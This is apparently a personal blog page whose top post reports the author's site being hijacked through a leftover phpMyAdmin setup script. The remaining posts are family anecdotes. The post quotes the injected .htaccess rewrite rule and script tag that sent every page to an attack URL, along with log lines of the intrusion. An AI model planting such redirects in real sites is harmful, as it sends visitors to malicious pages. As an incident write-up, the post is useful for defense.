Oct 17 2010

I've been hacked!

Today – at 4:26pm (server time) my site was hacked.

 All pages on the site were redirecting to http://webarh.com/z.php (don't go there – it's an attack site – the buggers.)

 After trying to figure out how hey got in – I found that my server (which is a VPS) has PhpMySQL installed as a default in apache to attach to the alias of /myadmin.  They (the hackors/bot/whatev) attached through a BASIC DEFAULT INSTALL SCRIPT THE MORONS LEFT OPEN.  There.  I feel a bit better.

Okay – I've removed the GAPING WIDE HOLE in my server by removing the unwanted application and restored the site from backups.  Since it's only been hijacked for just under four hours, I am hoping not too many people have been affected (mainly the search bots which will tag the site as infected).

I really can't believe that the installation script was left after the system admins made the image for my VPS.  Really dumb.  As a user of the hosting – I wasn't even aware that the addition of an apache alias was even installed.  I've been hacked because of my own stupidity before – and I find it annoying – but being hacked because of someone else's mistake is extremely aggravating. 

The final attacked updated all .htaccess files to include:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/z.php

 

And they inserted the following in the base of the index.php and index.html files for each folder:

<script>document.location.href='http://webarh.com/z.php';</script>

 

The log files show a single GET and then POST to the file:

174.129.214.209 – – [17/Oct/2010:16:26:38 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 200 14060 "-" "-"
174.129.214.209 – – [17/Oct/2010:16:26:38 -0400] "POST /myadmin/scripts/setup.php HTTP/1.1" 200 – "-" "-"
 

That's it.  That's the hacker.   The host manager has been notified.

 


Oct 10 2010

It gets better….? !


Oct 8 2010

A journey for a lost friend


Sep 28 2010

Cameron's first Coke

 Michelle and I haven't let Cameron (or Nate) have soft drinks. We don't
think they need that much sugar so young. We've told Cameron he was
allowed to have some on his third birthday. We gave him maybe a quarter
of a can with his dinner. His brother wanted to have pop too, so we
gave him some plain soda water – comes from a can and has bubbles – but
no sugar. He is off camera and doesn't like it ;)

 


Sep 24 2010

Grace


Sep 12 2010

To end the controversy…

Okay – to explain the previous images of Nate's eye and how he managed to give himself a shiner.

We were at the Mall and the boys were being pretty good, so Michelle thought it would be nice if they got a treat.  On the way out she thought it would be nice if they had a ride on the coin operated rides.  The rides are located on a raised platform in the middle of the mall hallway.

When Mic mentioned it to the boys, they ran for the rides in excitement.  Nate either missed the step, or completely ignored it.  Either way – he tripped over the edge and landed face-first on the platform.  He let out an immediate scream and by the time I got to him his eye had already swelled to the size of a small marble.

Now… to settle a personal argument… the size of the platform…


Sep 11 2010

The Empathic Civilization


Sep 9 2010

Way too much eye shadow kid.


Sep 6 2010

Nate just doesn't listen.


Aug 24 2010

I don't want directions…